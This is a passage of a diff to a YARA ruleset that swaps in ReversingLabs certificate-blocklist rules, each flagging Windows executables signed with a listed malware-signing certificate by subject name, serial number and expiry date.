+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VENTE DE TOUT" and pe.signatures [ i ] . serial == "2d:cd:06:99:da:08:91:5d:de:6d:04:4c:b4:74:15:7c" and 1601830010 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_642Ad8E5Ef8B3Ac767F0D5C1A999Bdaa : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_4B03Cabe6A0481F17A2Dbeb9Aefad425 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "d29e2342-2d38-5939-aa3f-4506fb36c74a"
+		id = "30108ce3-b133-5e1d-924f-7caaf390e836"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L13168-L13184"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "d42d40ca381b99b68a3384cecf585aab2acca66d4e13503d337b1605d587d0b5"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L6086-L6102"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "6986e7bd90842647ec6a168c30dca2d5ae8ae5b1c1014f966dd596a78859ac6e"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16999,21 +41664,21 @@ rule REVERSINGLABS_Cert_Blocklist_642Ad8E5Ef8B3Ac767F0D5C1A999Bdaa : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Itgms Ltd" and pe.signatures [ i ] . serial == "64:2a:d8:e5:ef:8b:3a:c7:67:f0:d5:c1:a9:99:bd:aa" and 1447804800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RASSVET, OOO" and pe.signatures [ i ] . serial == "4b:03:ca:be:6a:04:81:f1:7a:2d:be:b9:ae:fa:d4:25" and 1603230930 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_5333D3079D8Afda715703775E1389991 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_64Cd303Fa289790Afa03C403E9240002 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "4db299c6-5be9-5900-a944-07a0a41920a4"
+		id = "86644ef8-4218-5a04-9655-c7d51729872d"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L13186-L13202"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "98bd9d35c4e196a11943826115ab495833f7ef1d95f9736cc24255d6dd4fd21c"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L6104-L6120"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "f51556a8a12affbd7f7633bf8daa50e6332fa3d3448ea08853cf8ed28e593680"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17023,21 +41688,21 @@ rule REVERSINGLABS_Cert_Blocklist_5333D3079D8Afda715703775E1389991 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Trambambon LLC" and pe.signatures [ i ] . serial == "53:33:d3:07:9d:8a:fd:a7:15:70:37:75:e1:38:99:91" and 1239148800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MAITLAND TRIFECTA, INC." and pe.signatures [ i ] . serial == "64:cd:30:3f:a2:89:79:0a:fa:03:c4:03:e9:24:00:02" and 1602723600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_139A7Ee1F1A7735C151089755Df5D373 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_07Cef66A71C35Bc3Aed6D100C6493863 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "eaab67a1-ed7a-58f3-afb3-3637c3b72020"
+		id = "9c16c370-a382-54f7-ba2e-3b738740966f"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L13204-L13220"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "86072fef7d1488dc257c3ca8fbb99620ec06f8ecb671b4e20d09d0ce6cc8601d"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L6122-L6138"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "e741fc13fe4d03b145ed1d86e738b415a7260eae5b0908c6991c9ea9896f14cf"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17047,21 +41712,21 @@ rule REVERSINGLABS_Cert_Blocklist_139A7Ee1F1A7735C151089755Df5D373 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yongli Li" and pe.signatures [ i ] . serial == "13:9a:7e:e1:f1:a7:73:5c:15:10:89:75:5d:f5:d3:73" and 1476057600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Fubon Technologies Ltd" and pe.signatures [ i ] . serial == "07:ce:f6:6a:71:c3:5b:c3:ae:d6:d1:00:c6:49:38:63" and 1602740890 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_74Dbe83082E1B3Dfa29F9C24 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Be77Fe5C58B7A360Add6A3Fced4E8334 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "dbb75cf2-1b48-52f1-8d06-e35d48c4fea4"
+		id = "1bbaebe9-b3ca-5ee2-91ac-b2343ca8bb86"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L13222-L13238"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "1fdf6471d0b869df1a8630108cdaf1cc97d33e91d4726073913cdc54c7cf0042"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L6140-L6158"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "cea0d217206562c0045843405802d3b2fad01bdb2a4cfb52057625b43f5f8eee"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17071,21 +41736,21 @@ rule REVERSINGLABS_Cert_Blocklist_74Dbe83082E1B3Dfa29F9C24 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "EVANGEL TECHNOLOGY(HK) LIMITED" and pe.signatures [ i ] . serial == "74:db:e8:30:82:e1:b3:df:a2:9f:9c:24" and 1468817578 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Incar LLC" and ( pe.signatures [ i ] . serial == "00:be:77:fe:5c:58:b7:a3:60:ad:d6:a3:fc:ed:4e:83:34" or pe.signatures [ i ] . serial == "be:77:fe:5c:58:b7:a3:60:ad:d6:a3:fc:ed:4e:83:34" ) and 1602530730 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0A466553A6391Aafd181B400266C7B18 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_F097E59809Ae2E771B7B9Ae5Fc3408D7 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "ef8ff250-840f-5b55-b0c7-85ca54aadc59"
+		id = "1eed6f30-0648-5b8e-81ff-9f3af0f1c91d"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L13240-L13256"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "cb21e5759887904d6a38cd1b363610ebc0bfd9a357050c602210468992815cbe"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L6160-L6178"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "9e23ff26d3e1ea181e48fc23383e3717804858bc517a31ec508fa0753730c78e"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17095,21 +41760,21 @@ rule REVERSINGLABS_Cert_Blocklist_0A466553A6391Aafd181B400266C7B18 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PhaseQ Limited" and pe.signatures [ i ] . serial == "0a:46:65:53:a6:39:1a:af:d1:81:b4:00:26:6c:7b:18" and 1555545600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ABEL RENOVATIONS, INC." and ( pe.signatures [ i ] . serial == "00:f0:97:e5:98:09:ae:2e:77:1b:7b:9a:e5:fc:34:08:d7" or pe.signatures [ i ] . serial == "f0:97:e5:98:09:ae:2e:77:1b:7b:9a:e5:fc:34:08:d7" ) and 1602542033 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0D3Dec8794Fa7228D1Ee40Eeb8187149 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0Cf1Ed2A6Ff4Bee621Efdf725Ea174B7 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "54e9ec00-d054-521b-b60b-81efe3a8ce12"
+		id = "7f7ecbcd-7a92-526d-99a8-d849fffa19cb"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L13258-L13274"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "20084dc0b069d65755f859f5aef4be5599d1f066ba006199d3ce803b0d8f041e"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L6180-L6196"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "7030c122905105c72833cfcb41692bd9a67cf456e3309afce0b8f9e65c6aa5c1"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17119,21 +41784,21 @@ rule REVERSINGLABS_Cert_Blocklist_0D3Dec8794Fa7228D1Ee40Eeb8187149 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Financial Security Institute, Inc." and pe.signatures [ i ] . serial == "0d:3d:ec:87:94:fa:72:28:d1:ee:40:ee:b8:18:71:49" and 1582675200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LEVEL LIST SP Z O O" and pe.signatures [ i ] . serial == "0c:f1:ed:2a:6f:f4:be:e6:21:ef:df:72:5e:a1:74:b7" and 1603036100 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_24Af70B5D17A63Ad053E5821 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_1249Aa2Ada4967969B71Ce63Bf187C38 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "034228b3-1864-5a76-ad9d-531778be10ec"
+		id = "5b2876a2-8dfa-5456-a615-4ea69df53422"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L13276-L13292"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "d78f709067c83169484d9dd6e1dd8a88852362da028551d4e55e5703a22e04a7"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L6198-L6214"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "f84568cfe6304af0307a34bfed6dd346a74e714005b5e6f22a354b14f853ec65"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17143,21 +41808,21 @@ rule REVERSINGLABS_Cert_Blocklist_24Af70B5D17A63Ad053E5821 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "24:af:70:b5:d1:7a:63:ad:05:3e:58:21" and 1474179615 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Umbrella LLC" and pe.signatures [ i ] . serial == "12:49:aa:2a:da:49:67:96:9b:71:ce:63:bf:18:7c:38" and 1599181200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_402E9Fcba61E5Eaf9C0C7B3Bfd6259D9 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_D59A05955A4A421500F9561Ce983Aac4 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "a24e1201-4a90-5d0f-ac19-4d88a4e4cfe5"
+		id = "088f0f98-328b-50fa-b1e4-1d80023b3c09"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L13294-L13310"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "1bfc2610745a98ebcf0f77504815d9d1c448697fbe407d6c2e075219b401de50"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L6216-L6234"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "b7ed87a03f20872669369cc3cad4eae40ba597f06222194bd67262c094083ec1"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17167,21 +41832,21 @@ rule REVERSINGLABS_Cert_Blocklist_402E9Fcba61E5Eaf9C0C7B3Bfd6259D9 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yongli Li" and pe.signatures [ i ] . serial == "40:2e:9f:cb:a6:1e:5e:af:9c:0c:7b:3b:fd:62:59:d9" and 1477440000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Olymp LLC" and ( pe.signatures [ i ] . serial == "00:d5:9a:05:95:5a:4a:42:15:00:f9:56:1c:e9:83:aa:c4" or pe.signatures [ i ] . serial == "d5:9a:05:95:5a:4a:42:15:00:f9:56:1c:e9:83:aa:c4" ) and 1601895290 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_2C84F9136059E96134F8766670Eacd52 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_539015999E304A5952985A994F9C3A53 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "af7eb5ff-570f-5886-b550-3d327d05fabe"
+		id = "ccb4da10-3178-5d8f-be17-9c689e794418"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L13312-L13328"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "d6778630dcc3e4fe2816e6dee1b823e616f53de8a924057495c7c252948a71b4"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L6236-L6252"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "feeb1710bd5b048c689a2e45575529624cd1622dcc73db8fe7de6c133fdc5698"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17191,21 +41856,21 @@ rule REVERSINGLABS_Cert_Blocklist_2C84F9136059E96134F8766670Eacd52 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Open Source Developer, DIEGO MANUEL RODRIGUEZ" and pe.signatures [ i ] . serial == "2c:84:f9:13:60:59:e9:61:34:f8:76:66:70:ea:cd:52" and 1442215311 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Service lab LLC" and pe.signatures [ i ] . serial == "53:90:15:99:9e:30:4a:59:52:98:5a:99:4f:9c:3a:53" and 1599181200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_6716A9C195987D5Cfe53A094779461E7 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0B1926A5E8Ae50A0Efa504F005F93869 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "fbd05f8b-3289-565c-a5f4-a1514d06ae37"
+		id = "ce437144-0f99-5c41-8d15-edeceb34de4d"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L13330-L13346"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "648fd70432a791b3e589f5eda1b1510045b465623914a9762ff3dfb4a3e022f8"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L6254-L6270"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "1cbdf39a873c83d2b55723215fb4930a3ce23b6cab2d71a6cd5f16b2721e30f9"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17215,21 +41880,21 @@ rule REVERSINGLABS_Cert_Blocklist_6716A9C195987D5Cfe53A094779461E7 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Inter Technologies Ltd." and pe.signatures [ i ] . serial == "67:16:a9:c1:95:98:7d:5c:fe:53:a0:94:77:94:61:e7" and 1169424000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Nordkod LLC" and pe.signatures [ i ] . serial == "0b:19:26:a5:e8:ae:50:a0:ef:a5:04:f0:05:f9:38:69" and 1600650000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_876C00Bd665Df98B35554F67A5C1C32A : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0A23B660E7322E54D7Bd0E5Acc890966 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "830af0ac-fb01-5c6a-a7a3-2cf5c9d016fc"
+		id = "daae5f42-59ff-5838-9444-93357eaa9d60"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L13348-L13366"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "90bde1313db78d4166e8c87e7e4111c576880922b1c983f3a842ea030d38a0da"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L6272-L6288"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "17996dd0ec81623dbd4eeea98f9bbe37c11c911ca840833ecb9301bb0a9ddb52"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17239,21 +41904,21 @@ rule REVERSINGLABS_Cert_Blocklist_876C00Bd665Df98B35554F67A5C1C32A : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Lossera-M, OOO" and ( pe.signatures [ i ] . serial == "00:87:6c:00:bd:66:5d:f9:8b:35:55:4f:67:a5:c1:c3:2a" or pe.signatures [ i ] . serial == "87:6c:00:bd:66:5d:f9:8b:35:55:4f:67:a5:c1:c3:2a" ) and 1493078400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ARTBUD RADOM SP Z O O" and pe.signatures [ i ] . serial == "0a:23:b6:60:e7:32:2e:54:d7:bd:0e:5a:cc:89:09:66" and 1601254800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_4B093Cb60D4B992266F550934A4Ac7D0 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_6Cfa5050C819C4Acbb8Fa75979688Dff : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c459c3ac-205c-5c13-959d-c6b40f81222f"
+		id = "f91ecc17-7406-552a-8864-c9e1657a5ca9"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L13368-L13384"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "4b634bc706638d72f2d036d41cf092cac538e930d7d407eebc225b482fd64f51"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L6290-L6308"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "cffc234be78446191dd5f5990db9f17c7e28eeaa3e16f1eb8ad4ed1e58fdc25e"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17263,21 +41928,21 @@ rule REVERSINGLABS_Cert_Blocklist_4B093Cb60D4B992266F550934A4Ac7D0 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LCB SISTEMAS LTDA ME" and pe.signatures [ i ] . serial == "4b:09:3c:b6:0d:4b:99:22:66:f5:50:93:4a:4a:c7:d0" and 1478649600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Elite Web Development Ltd." and ( pe.signatures [ i ] . serial == "00:6c:fa:50:50:c8:19:c4:ac:bb:8f:a7:59:79:68:8d:ff" or pe.signatures [ i ] . serial == "6c:fa:50:50:c8:19:c4:ac:bb:8f:a7:59:79:68:8d:ff" ) and 1600176940 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_2050B54146B011Ed30F60F61 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_044E05Bb1A01A1Cbb50Cfb6Cd24E5D6B : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "0db2d42d-bdc3-50bc-b360-a39ccec4df41"
+		id = "c0796bc3-96cd-5d12-a0ee-97d8ed4a3076"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L13386-L13402"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "74749317fcefcdb698046a6f42c6c6e05cc1eab1370b3b1fd7d025f49de4a032"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L6310-L6326"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "40c80d3b6bedb0b3454e14501745a6e82b6ea9ac202748867a2e937fb79c6f6c"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17287,21 +41952,21 @@ rule REVERSINGLABS_Cert_Blocklist_2050B54146B011Ed30F60F61 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "20:50:b5:41:46:b0:11:ed:30:f6:0f:61" and 1476773926 <= pe.signatures [ i ] . not_after )
